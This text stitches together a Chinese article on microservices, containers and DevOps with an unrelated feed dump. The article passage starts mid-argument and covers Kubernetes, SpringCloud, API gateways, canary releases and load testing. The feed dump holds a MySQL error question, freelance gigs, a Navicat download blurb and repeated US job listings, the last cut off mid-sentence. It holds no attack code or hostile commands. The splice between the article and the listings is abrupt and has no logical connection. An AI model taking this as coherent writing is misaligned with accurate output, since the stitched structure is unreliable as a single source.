有的客户起初使用开源的缓存和消息队列,分布式数据库,但是读写频率到了一定的程度,就会出现各种奇奇怪怪的问题,不知道应该如何调优。

有的客户发现,一旦到了互联网大促级别,Oracle数据库是肯定扛不住的,需要从Oracle迁移到DDB分布式数据库,可是怎么个迁移法,如何平滑过渡,心里没底。

有的客户服务拆分之后,原来原子化的操作分成了两个服务调用,如何仍然保持原子化,要不全部成功,要不全部失败,需要分布式事务,虽然业内有大量的分布式方案,但是能够承载高并发支付的框架还没有。

当出现这些问题的时候,才应该考虑进入第三个阶段,微服务化

四、阶段三:组织DevOps化,架构微服务化,基础设施容器化

image

4.1. 阶段三的应用架构

从SOA到微服务化这一步非常关键,复杂度也比较高,上手需要谨慎。

为了能够承载互联网高并发,业务往往需要拆分的粒度非常的细,细到什么程度呢?我们来看下面的图。

image

在这些知名的使用微服务的互联网公司中,微服务之间的相互调用已经密密麻麻相互关联成为一个网状,几乎都看不出条理来。

为什么要拆分到这个粒度呢?主要是高并发的需求。

但是高并发不是没有成本的,拆分成这个粒度会有什么问题呢?你会发现等拆完了,下面的这些措施一个都不能少。

  • 服务之间要设定熔断,限流,降级策略,一旦调用阻塞应该快速失败,而不应该卡在那里,处于亚健康状态的服务要被及时熔断,不产生连锁反应。非核心业务要进行降级,不再调用,将资源留给核心业务。要在压测到的容量范围内对调用限流,宁可慢慢处理,也不用一下子都放进来,把整个系统冲垮。

image

应用层需要处理这十二个问题,最后一个都不能少,实施微服务,你做好准备了吗?你真觉得攒一攒springcloud,就能够做好这些吗?

4.2. 阶段三的运维模式

业务的微服务化改造之后,对于运维的模式是有冲击的。

image

如果业务拆成了如此网状的细粒度,服务的数目就会非常的多,每个服务都会独立发布,独立上线,因而版本也非常多。

这样环境就会非常的多,手工部署已经不可能,必须实施自动部署。好在在上一个阶段,我们已经实施了自动部署,或者基于脚本的,或者基于镜像的,但是到了微服务阶段都有问题。

如果基于脚本的部署,脚本原来多由运维写,由于服务太多,变化也多,脚本肯定要不断的更新,而每家公司的开发人员都远远多于运维人员,运维根本来不及维护自动部署的脚本。那脚本能不能由开发写呢?一般是不可行的,开发对于运行环境了解有限,而且脚本没有一个标准,运维无法把控开发写的脚本的质量。

基于虚拟机镜像的就会好很多,因为需要脚本做的事情比较少,大部分对于应用的配置都打在镜像里面了。如果基于虚拟机镜像进行交付,也能起到标准交付的效果。而且一旦上线有问题,也可以基于虚拟机镜像的版本进行回滚。

但是虚拟机镜像实在是太大了,动不动几百个G,如果一共一百个服务,每个服务每天一个版本,一天就是10000G,这个存储容量,谁也受不了。

这个时候,容器就有作用了。镜像是容器的根本性发明,是封装和运行的标准,其他什么namespace,cgroup,早就有了。

原来开发交付给运维的,是一个war包,一系列配置文件,一个部署文档,但是由于部署文档更新不及时,常常出现运维部署出来出错的情况。有了容器镜像,开发交付给运维的,是一个容器镜像,容器内部的运行环境,应该体现在Dockerfile文件中,这个文件是应该开发写的。

这个时候,从流程角度,将环境配置这件事情,往前推了,推到了开发这里,要求开发完毕之后,就需要考虑环境部署的问题,而不能当甩手掌柜。由于容器镜像是标准的,就不存在脚本无法标准化的问题,一旦单个容器运行不起来,肯定是Dockerfile的问题。

而运维组只要维护容器平台就可以,单个容器内的环境,交给开发来维护。这样做的好处就是,虽然进程多,配置变化多,更新频繁,但是对于某个模块的开发团队来讲,这个量是很小的,因为5-10个人专门维护这个模块的配置和更新,不容易出错。自己改的东西自己知道。

如果这些工作量全交给少数的运维团队,不但信息传递会使得环境配置不一致,部署量会大非常多。

容器作用之一就是环境交付提前,让每个开发仅仅多做5%的工作,就能够节约运维200%的工作,并且不容易出错。

image

容器的另外一个作用,就是不可改变基础设施。

容器镜像有个特点,就是ssh到里面做的任何修改,重启都不见了,恢复到镜像原来的样子,也就杜绝了原来我们部署环境,这改改,那修修最后部署成功的坏毛病。

因为如果机器数目比较少,还可以登录到每台机器上改改东西,一旦出了错误,比较好排查,但是微服务状态下,环境如此复杂,规模如此大,一旦有个节点,因为人为修改配置导致错误,非常难排查,所以应该贯彻不可改变基础设施,一旦部署了,就不要手动调整了,想调整从头走发布流程。

这里面还有一个概念叫做一切即代码,单个容器的运行环境Dockerfile是代码,容器之间的关系编排文件是代码,配置文件是代码,所有的都是代码,代码的好处就是谁改了什么,Git里面一清二楚,都可以track,有的配置错了,可以统一发现谁改的。

4.3. 阶段三的组织形态

到了微服务阶段,实施容器化之后,你会发现,然而本来原来运维该做的事情开发做了,开发的老大愿意么?开发的老大会投诉运维的老大么?

这就不是技术问题了,其实这就是DevOps,DevOps不是不区分开发和运维,而是公司从组织到流程,能够打通,看如何合作,边界如何划分,对系统的稳定性更有好处。

image

其实开发和运维变成了一个融合的过程,开发会帮运维做一些事情,例如环境交付的提前,Dockerfile的书写。

运维也可以帮助研发做一些事情,例如微服务之间的注册发现,治理,配置等,不可能公司的每一个业务都单独的一套框架,可以下沉到运维组来变成统一的基础设施,提供统一的管理。

实施容器,微服务,DevOps后,整个分工界面就变成了下面的样子。

image

在网易就是这个模式,杭州研究院作为公共技术服务部门,有运维部门管理机房,上面是云平台组,基于OpenStack开发了租户可自助操作的云平台。PaaS组件也是云平台的一部分,点击可得,提供SLA保障。容器平台也是云平台的一部分,并且基于容器提供持续集成,持续部署的工具链。

微服务的管理和治理也是云平台的一部分,业务部门可以使用这个平台进行微服务的开发。

业务部门的中间件组或者架构组合云平台组沟通密切,主要是如何以正确的姿势使用云平台组件。

业务部门分前端组,业务开发组,中台开发组。

五、如何实施微服务,容器化,DevOps

实施微服务,容器化,DevOps有很多的技术选型。

其中容器化的部分,Kubernetes当之无愧的选择。但是Kubernetes可不仅仅志在容器,他是为微服务而设计的。对于实施微服务各方面都有涉及。

详细分析参加为什么 kubernetes 天然适合微服务

image

但是Kubernetes对于容器的运行时生命周期管理比较完善,但是对于服务治理方面还不够强大。

因而对于微服务的治理方面,多选择使用Dubbo或者SpringCloud。使用Dubbo的存量应用比较多,相对于Dubbo来讲,SpringCloud比较新,组件也比较丰富。但是SpringCloud的组件都不到开箱即用的程度,需要比较高的学习曲线。

image

因而基于Kubernetes和SpringCloud,就有了下面这个微服务,容器,DevOps的综合管理平台。包含基于Kubernetes的容器平台,持续集成平台,测试平台,API网关,微服务框架,APM应用性能管理。

image

主要为了解决从阶段一到阶段二,或者阶段二到阶段三的改进中的痛点。

下面我们列举几个场景。

场景一:架构SOA拆分时,如何保证回归测试功能集不变

前面说过,服务拆分后,最怕的是拆完了引入一大堆的bug,通过理智肯定不能保证拆分后功能集是不变的,因而需要有回归测试集合保证,只要测试集合通过了,功能就没有太大的问题。

回归测试最好是基于接口的,因为基于UI的很危险,有的接口是有的,但是UI上不能点,这个接口如果有Bug,就被暂时隐藏掉了,当后面有了新的需求,当开发发现有个接口能够调用的时候,一调用就挂了。

image

有了基于Restful API的接口测试之后,可以组成场景测试,将多个API调用组合成为一个场景,例如下单,扣优惠券,减库存,就是一个组合场景。

另外可以形成测试集合,例如冒烟测试集合,当开发将功能交付给测试的时候,执行一下。再如日常测试集合,每天晚上跑一遍,看看当天提交的代码有没有引入新的bug。再如回归测试集合,上线之前跑一遍,保证大部分的功能是正确的。

场景二:架构SOA化的时候,如何统一管理并提供中台服务

当业务要提供中台服务的时候,中台服务首先希望能够注册到一个地方,当业务组开发业务逻辑的时候,能够在这个地方找到中台的接口如何调用的文档,当业务组的业务注册上来的时候,可以进行调用。

image

在微服务框架普通的注册发现功能之外,还提供知识库的功能,使得接口和文档统一维护,文档和运行时一致,从而调用方看着文档就可以进行调用。

另外提供注册,发现,调用期间的鉴权功能,不是谁看到中台服务都能调用,需要中台管理员授权才可以。

为了防止中台服务被恶意调用,提供账户审计功能,记录操作。

场景三:服务SOA化的时候,如何保证关键服务的调用安全

image

有的服务非常关键,例如支付服务,和资金相关,不是谁想调用就能调用的,一旦被非法调用了,后果严重。

在服务治理里面有路由功能,除了能够配置灵活的路由功能之外,还可以配置黑白名单,可以基于IP地址,也可以基于服务名称,配置只有哪些应用可以调用,可以配合云平台的VPC功能,限制调用方。

场景四:架构SOA化后,对外提供API服务,构建开放平台

image

架构SOA化之后,除了对内提供中台服务,很多能力也可以开放给外部的合作伙伴,形成开放平台。例如你是一家物流企业,除了在你的页面上下单寄快递之外,其他的电商也可以调用你的API来寄快递,这就需要有一个API网关来管理API,对接你的电商只要登录到这个API网关,就能看到API以及如何调用,API网关上面的文档管理就是这个作用。

另外API网关提供接口的统一认证鉴权,也提供API接口的定时开关功能,灵活控制API的生命周期。

场景五:互联网场景下的灰度发布和A/B测试

接下来我们切换到互联网业务场景,经常会做A/B测试,这就需要API网关的流量分发功能。

例如我们做互联网业务,当上一个新功能的 时候,不清楚客户是否喜欢,于是可以先开放给山东的客户,当HTTP头里面有来自山东的字段,则访问B系统,其他客户还是访问A系统,这个时候可以看山东的客户是否都喜欢,如果都喜欢,就推向全国,如果不喜欢,就撤下来。

场景六:互联网场景下的预发测试

这个也是互联网场景下经常遇到的预发测试,虽然我们在测试环境里面测试了很多轮,但是由于线上场景更加复杂,有时候需要使用线上真实数据进行测试,这个时候可以在线上的正式环境旁边部署一套预发环境,使用API网关将真实的请求流量,镜像一部分到预发环境,如果预发环境能够正确处理真实流量,再上线就放心多了。

场景七:互联网场景下的性能压测

互联网场景下要做线上真实的性能压测,才能知道整个系统真正的瓶颈点。但是性能压测的数据不能进真实的数据库,因而需要进入影子库,性能压测的流量,也需要有特殊的标记放在HTTP头里面,让经过的业务系统知道这是压测数据,不进入真实的数据库。

这个特殊的标记要在API网关上添加,但是由于不同的压测系统要求不一样,因而需要API网关有定制路由插件功能,可以随意添加自己的字段到HTTP头里面,和压测系统配合。

场景八:微服务场景下的熔断,限流,降级

微服务场景下,大促的时候,需要进行熔断,限流,降级。这个在API网关上可以做,将超过压测值的流量,通过限流,拦在系统外面,从而保证尽量的流量,能够下单成功。

在服务之间,也可以通过微服务框架,进行熔断,限流,降级。Dubbo对于服务的控制在接口层面,SpringCloud对于服务的管理在实例层面,这两个粒度不同的客户选择不一样,都用Dubbo粒度太细,都用SpringCloud粒度太粗,所以需要可以灵活配置。

image

场景九:微服务场景下的精细化流量管理。

image

在互联网场景下,经常需要对于流量进行精细化的管理,可以根据HTTP Header里面的参数进行分流,例如VIP用户访问一个服务,非VIP用户访问另一个服务,这样可以对高收入的用户推荐更加精品的产品,增加连带率。


          Kshops      Cache   Translate Page      
Please, I am asking for help with this error during installation.     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(14) NOT NULL, p_added timestamp(14) NOT NULL, PRIMARY KEY (p_id), KEY p_' at line 17
          Looking for experienced PHP developer for Flynax script      Cache   Translate Page      
Please only reply if you have experience with Flynax PHP scripts. I am looking for a experienced PHP developer for long term. Loyal and respectful person over here. (Budget: €12 - €18 EUR, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          Filemaker developer needed for a teamwork data maintenance      Cache   Translate Page      
We need a customized mobile app to realize a teamwork machine data maintenance. Task Background We are selling products to optimize paper production. Our customers are all from different paper mills... (Budget: $25 - $50 USD, Jobs: Database Programming, FileMaker, MySQL, PHP, Software Architecture)
          Update online reservation system      Cache   Translate Page      
need to update online reservation system, (Budget: $10 - $30 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Engineer I - Software - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, SQL Server, Oracle, PostgreSQL. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to redefine the communications...
From DISH - Sat, 27 Oct 2018 12:43:20 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Experts Engaged in Delivering Their Best - This is the cornerstone of our service-oriented...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sun, 29 Jul 2018 06:18:46 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, MS SQL, Oracle, or other professional database system. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to...
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          دانلود Navicat Premium 12.1.9 – مدیریت بانک اطلاعاتی      Cache   Translate Page      

Download Navicat Premium 11.2.14 - database management

Navicat Premium is an application for managing and working with MySQL, PostgreSQL and Oracle databases. It lets you organize and exchange the data in your databases and rest assured that the process is carried out safely. With Navicat Premium you can connect to local or remote servers and handle tasks such as importing and exporting data with ease.

The post Download Navicat Premium 12.1.9 – database management appeared first on بیت دانلود.


          Stage: Stage PHP Developer / Programmeur in Bodegraven      Cache   Translate Page      
We are continuously looking for PHP interns with skills! Respond quickly for a challenging internship at a young, ambitious company! The period is to be determined.

Description of the internship / graduation project
Are you a student with an affinity for web development? And are you the hobbyist who enjoys programming? Then we are looking for you!

An internship with us means working in a close-knit team of smart colleagues where you get the room to make your mark and to grow. We challenge you to improve your skills and are happy to help you do so. You will work on great projects for a range of clients!

We expect good problem-solving skills and knowledge of PHP, MySQL, HTML and a few CMS systems and frameworks. You must be open to learning and using new technologies and APIs and see that as a challenge. If you recognize yourself in this and the requirements and our offer appeal to you, we challenge you to respond!!

We offer
- A market-rate internship allowance
- A varied internship
- Good supervision
- Nice colleagues and a good working atmosphere
- Your own workstation with a fast Mac

About us
We are a young and energetic communications agency. We support SMEs with our full-service marketing and communications advice, graphic design and web development. With great enthusiasm we couple creativity with decisiveness. We set ourselves apart with a down-to-earth and surprisingly complete approach. Curious about our work? ...
          Werkstudent (m/w) Web Entwicklung innovativer Markenprojekte      Cache   Translate Page      
Job offer: More information and applications at: https://www.campusjaeger.de/jobs/6968?s=18111178 + What can you expect? We are an agency for digital experiences and build innovative solutions for renowned brand clients on the web, social networks and mobile devices. Almost every day we face different, always new and exciting tasks. Routine and boredom are foreign words to us. * Support us as a working student (m/f) in the development of demanding, responsive web projects (websites, microsites, online shops, games, digital experience worlds) + What you should bring: * PHP 5, MySQL, HTML * object-oriented programming * experience with Zend, Flow3, Laravel or another MVC framework ... 0 comments, read 40 times.
          (USA-MA-Boston) Java Developer - Dropwizard, Cloud Computing, Java      Cache   Translate Page      
Java Developer - Dropwizard, Cloud Computing, Java Java Developer - Dropwizard, Cloud Computing, Java - Skills Required - Dropwizard, Cloud Computing, Java, MySQL, AWS, Linux If you are a Java Developer with experience, please read on! **What You Need for this Position** At Least 3 Years of experience and knowledge of: - Dropwizard - Cloud Computing - Java - MySQL - AWS - Linux **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Java Developer - Dropwizard, Cloud Computing, Java* *MA-Boston* *TB7-1492874*
          (USA-OH-Cincinnati) Senior Software Engineer - Java      Cache   Translate Page      
Senior Software Engineer - Java Senior Software Engineer - Java - Skills Required - Java, JSP, Spring, MVC, Hibernate, MySQL, REST API We are an online auction marketplace with over 10 years of experience in connecting buyers and sellers nationwide. Join a rapidly growing team of young and seasoned professionals in creating the ultimate bidding experience and the best deals anywhere. **What You Will Be Doing** We are looking to hire a mid level software engineer with 3-5 years of Java development experience. We are looking for someone who works well with a team and who is passionate about building and maintaining great software that improves both our customer and employee experiences. We're a fast paced but casual work environment that's moving into a new growth stage and need people who are excited and passionate about the work they do and the team they are part of. Responsibilities include: - Ownership of existing code base - Maintaining, fixing and improving existing software with clean, efficient code - Testing and deploying programs and systems - Teaching and mentoring junior members of the team - Continuing to learn and improve your own skill set **What You Need for this Position** - 3-5 years of experience as a Software Developer, Software Engineer or similar role - Able and willing to work with others on a team - Experience with software design and development in a test-driven environment - Knowledge of coding languages: Java, JSP, Spring MVC, HIbernate/JDBC template MySQL, REST API - Ability to learn new languages and technologies - Resourcefulness and troubleshooting aptitude - Attention to detail - BSc/BA in Computer Science, Engineering or a related field **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Senior Software Engineer - Java with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer - Java* *OH-Cincinnati* *RV5-1493020*
          (USA-CA-Irvine) System Administrator - Linux/AWS      Cache   Translate Page      
System Administrator - Linux/AWS System Administrator - Linux/AWS - Skills Required - AWS, TDD, CI/CD, Linux If you are a DevOps Engineer with experience, please read on! Located in South Irvine, we are a privately held start-up revolutionizing the world of package delivery. We offer an exciting, fast-paced work environment with evolving technology and are looking for a sharp Linux System Administrator to come in and make an immediate impact! **What's In It for You** We offer an exciting compensation package including but not limited to: - A competitive base salary (DOE) - Full benefits (Medical, Dental, Vision) - Generous PTO/Sick time - Great company culture - Surprise lunches, group activities, holiday celebrations! - Collaborative environment with passionate team members **What You Need for this Position** We are open to all levels of candidates that meet the minimum requirements of: - At least 1-2 years of professional DevOps/Ops/Systems Administration experience (the more the merrier!) - AWS experience (EC2-VPC and EC2 Classic, RDS, S3, VPC, SQS, ELB, IAM,ElasticSearch) - Linux (RedHat or CENTOS 7) - No windows servers! Preferred, knowledge of: - RDS / MySQL DCM - AWS Load Balancing - PCI and other security related standards and requirements -Solid understanding of software development life cycle, test driven development, continuous integration and continuous delivery - Proficient in modern web development patterns and practices - Solid understanding of core AWS services and their management in production environments - Docker Implementation and Deployment - Alert Logic Notification Setup - Administration skills in at least some of the following: JIRA, Confluence, BitBucket So, if you are a System Administrator with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *System Administrator - Linux/AWS* *CA-Irvine* *RK6-1492854*
          (USA-NY-New York City) Senior Ruby Developer - Growing FinTech company!      Cache   Translate Page      
Senior Ruby Developer - Growing FinTech company! Senior Ruby Developer - Growing FinTech company! - Skills Required - RUBY, Ruby On Rails, PostgreSQL, MySQL If you are a Senior Ruby Developer with experience, please read on! We are a growing financial technology company in NYC, looking to build our development team with a senior level individual. Lots of opportunity! We are looking for a Senior Ruby Developer with 4+ years of Ruby development who can also be a mentor to the team. This is a Developer role, but in a player/coach capacity. You must come from a high traffic environment, data heavy so you can build highly scalable applications. You must have experience with MVC and the ability to design as well as build web interfaces with Ruby on Rails and multiple databases. If you want to be part of something big, we want to hear from you! You do not need a financial services background but that is a plus too! **What You Need for this Position** Requirements: 4+ years of Ruby on Rails development experience, full stack development Experience with SQL Server or MySQL Experience with MVC Strong background in design patterns Experience with a high traffic, data intense web application **What's In It for You** We offer a strong compensation package and a great environment! Local Candidates ONLY please So, if you are a Senior Ruby Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Ruby Developer - Growing FinTech company!* *NY-New York City* *RK3-1492818*
          (USA-OH-Cincinnati) Senior Ruby Developer - Growing FinTech company!      Cache   Translate Page      
Senior Ruby Developer - Growing FinTech company! Senior Ruby Developer - Growing FinTech company! - Skills Required - RUBY, Ruby On Rails, PostgreSQL, MySQL If you are a Senior Ruby Developer with experience, please read on! We are a growing financial technology company looking to build our development team with a senior level individual. Lots of opportunity! We are looking for a Senior Ruby Developer with 4+ years of Ruby development who can also be a mentor to the team. This is a Developer role, but in a player/coach capacity. You must come from a high traffic environment, data heavy so you can build highly scalable applications. You must have experience with MVC and the ability to design as well as build web interfaces with Ruby on Rails and multiple databases. If you want to be part of something big, we want to hear from you! You do not need a financial services background but that is a plus too! **What You Need for this Position** Requirements: 4+ years of Ruby on Rails development experience, full stack development Experience with SQL Server or MySQL Experience with MVC Strong background in design patterns Experience with a high traffic, data intense web application **What's In It for You** We offer a strong compensation package and a great environment! Local Candidates ONLY please So, if you are a Senior Ruby Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Ruby Developer - Growing FinTech company!* *OH-Cincinnati* *RK3-1492832*
          (USA-MI-Traverse City) Software Engineer - VB.Net, C#, Test Driven Development      Cache   Translate Page      
Software Engineer - VB.Net, C#, Test Driven Development Software Engineer - VB.Net, C#, Test Driven Development - Skills Required - VB.Net, C#, Test Driven Development, Azure, SQL Server, MySQL, SqlLite, Agile, SCRUM, Devops If you are a Software Engineer with experience, please read on! Located in Traverse City, MI, we are a successful healthcare company that has operated for decades with multiple locations nationwide! Our goal as an organization is to provide the best experience possible in health care services. **What You Will Be Doing** The Software Engineer will be responsible for supporting and enhancing software applications, troubleshoot issues, and oversee the code review process. Will oversee the software documentation phase along with serving as a point person for technical issues. **What You Need for this Position** At Least 3 Years of experience and knowledge of: - VB.Net - C# - Test Driven Development - Azure - SQL Server - MySQL - SqlLite - Agile - SCRUM - DevOps **What's In It for You** - Competitive Base Salary (DOE) - Full Health Benefits - 401(k) - Career Growth and Development - Company Perks - Paid Time off (PTO) So, if you are a Software Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer - VB.Net, C#, Test Driven Development* *MI-Traverse City* *PP4-1492998*
          (USA-MN-Cottage Grove) Senior Software Engineer - PHP, JavaScript, LAMP      Cache   Translate Page      
Senior Software Engineer (PHP) - PHP, JavaScript, LAMP Senior Software Engineer (PHP) - PHP, JavaScript, LAMP - Skills Required - PHP, JavaScript, LAMP, Linux, Apache, MySQL, JQuery, HTML, CSS, API If you are a Senior Software Engineer with PHP and JavaScript experience, please read on! We are located just south of the beautiful Saint Paul, MN area and we are a cutting edge software company in the hospitality space. We were just named one of the fastest growing tech companies in the area and are rapidly expanding. We have a very fast paced and collaborative environment that really enjoys the culture we have created. We need a skilled full stack software engineer who is well-versed with PHP and also has experience working with JavaScript. This person will help create cutting edge web applications and improve the efficiency and scalability of our business applications. This developer will also help design/develop front-end interfaces, underlying APIS, and backend systems. **Top Reasons to Work with Us** -Work with cutting edge technology -Significant room for growth -Outstanding work environment **What You Will Be Doing** -Full stack development in PHP and JavaScript -Design/develop front-end interfaces, underlying APIS, and backend systems -Enhance existing business applications -Help lead/mentor more junior developers **What You Need for this Position** At Least 3-5 Years of experience and knowledge of: - PHP - JavaScript - API Design - HTML/CSS Strong nice to haves: -SQL - LAMP stack - SQL - JQuery **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - 401k So, if you are a Senior Software Engineer with PHP and JavaScript experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer - PHP, JavaScript, LAMP* *MN-Cottage Grove* *MB6-1492934*
          (USA-PA-Kulpsville) Full-Stack Developer- Rapidly Growing Marketing Agency      Cache   Translate Page      
Full-Stack Developer- Rapidly Growing Marketing Agency Full-Stack Developer- Rapidly Growing Marketing Agency - Skills Required - PHP, MySQL, SSO integrations such as SAML2, APIs, Content Management Systems like WordPress and Magento, JavaScript Frameworks like React, JavaScript, XHTML, CSS, JQuery If you are a Full-Stack Developer with experience, please read on! **Top Reasons to Work with Us** 1. Based outside of Philadelphia, we are a rapidly growing marketing company. 2. Have been around for 10+ years and rapidly growing. 3. You will get the chance to work on exciting new development projects on a talented team. **What You Will Be Doing** -Assist Digital Project Manager in mapping development needs for proposed projects and projects in process -Assist Digital Project Manager in monitoring status of projects in process and reporting status updates to business development and account staff -Develop websites, website apps and native apps using: Content Management Systems: WordPress and Magento (Shopify, BigCommerce, Joomla and Drupal are a plus) Modern Javascript Frameworks such as React -MySQL database management -SSO integrations such as SAML2 -APIs **What You Need for this Position** -Minimum 2+ years of experience with web development - including responsive design, search engine optimization, and custom applications -Possess basic development programming skills to include, JavaScript, PHP, XHTML, CSS, jQuery and API's -Candidate must have a strong understanding of UI, cross-browser compatibility, general web functions and standards -A solid understanding of web application development processes, from the layout/user interface to relational database structures -Ability to communicate directly with peers, managers, and clients while leading development to a completed and successful solution -Strong organization skills to manage multiple timelines and complete tasks quickly within the constraints of clients' timelines and budgets -Experience programming common content management systems:Wordpress and Magento (Shopify, BigCommerce, Joomla and Drupal are a plus) -Demonstrated ability to work autonomously with solid decision-making skills -Intellectually curious and passionate about digital culture and technology **What's In It for You** -Competitive Base Salary ($60k-$70k) -401k -Vacation/PTO -Paid Holidays -Medical/Dental/Vision So, if you are a Full-Stack Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full-Stack Developer- Rapidly Growing Marketing Agency* *PA-Kulpsville* *KC9-1492844*
          (USA-NC-Cary) Software Engineer - PHP, Java, JavaScript      Cache   Translate Page      
Software Engineer - PHP, Java, JavaScript Software Engineer - PHP, Java, JavaScript - Skills Required - PHP, Java, JavaScript, MySQL, MVC, Linux, Apache, GIT, Subversion If you are a Software Engineer with PHP and Java experience, please read on! Based in Cary, NC - we provide accurate contact information and sales leads related to the e-commerce industry. Our company is looking for the right candidate to join our in-house engineering team. So, if you are interested in joining our growing team, please apply today! **Top Reasons to Work with Us** 1. Amazing Reputation. 2. Work with and learn from the best in the business. 3. Opportunity for career and income growth. **What You Will Be Doing** - Improve our next generation web technology tracking systems using machine learning and AI - Design and develop algorithms and techniques for high-volume data analysis - Build upon some of our most advanced platforms to maximize performance. **What You Need for this Position** At Least 3 Years of experience and knowledge of: - PHP - Java - JavaScript - MySQL - MVC - Linux - Apache - GIT - Subversion **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer - PHP, Java, JavaScript* *NC-Cary* *JW8-1492814*
          (USA-VA-Reston) Java Engineer      Cache   Translate Page      
Java Engineer (Mid-level to Senior) Java Engineer (Mid-level to Senior) - Skills Required - Java Servlets, Java Server Pages, Apache Tomcat, MySQL, Java 8, Hashmap, Lock, JDBC, GIT, Agile If you are a Java Engineer (Mid-level to Senior) with experience, please read on! **Top Reasons to Work with Us** Competitive salaries and benefits packages offered. As part of our team, you'll spend time solving challenging problems in a customer-centric environment with a team that always make tasks fun. This client has a 7-year history of innovation, stability, and profitability. **What You Will Be Doing** -Participate in product design reviews to provide input on functional requirements, product designs, and development schedules -Analyze implementation choices for selected algorithms -Implement real-time distributed services for SaaS solution -Integrate third-party interactions via real-time API calls **What You Need for this Position** -MS in Computer Science or Software Engineering (GPA 3.5+/4), plus three (3) years of software development experience; OR BS Degree in Computer Science or Software Engineering (GPA 3.5+/4) plus five (5) years of software development experience; -At least four (4) years of programming experience in Java, Java Servlets, and Java Server Pages with application deployment on Apache Tomcat and MySQL as the most recent development experience; at least 100,000 lines of written Java code in the past three (3) years; and at least four (4) years of real-time enterprise development experience, including the support for multiple tenants, distributed transactions, persistent queues, and thread-safe service delivery. -Must also have thorough understanding of advanced abstract data structures such as lists, queues, trees including the operations (e.g., insert, remove) with their corresponding computational complexities (e.g., big-O (1)); -Knowledge of analysis of algorithms with emphasis on worst-case complexity and time/space tradeoffs covering general-purpose sorting (e.g., selection sort), traversal (e.g., breadth-first), search (e.g., binary search), and storage; -Excellent knowledge of core Java 8, including available abstract data structures (e.g., HashMap), concurrency control mechanisms (e.g., Lock), memory management, security, object serialization and persistence via JDBC; -Source control management experience with emphasis on Git; advanced understanding 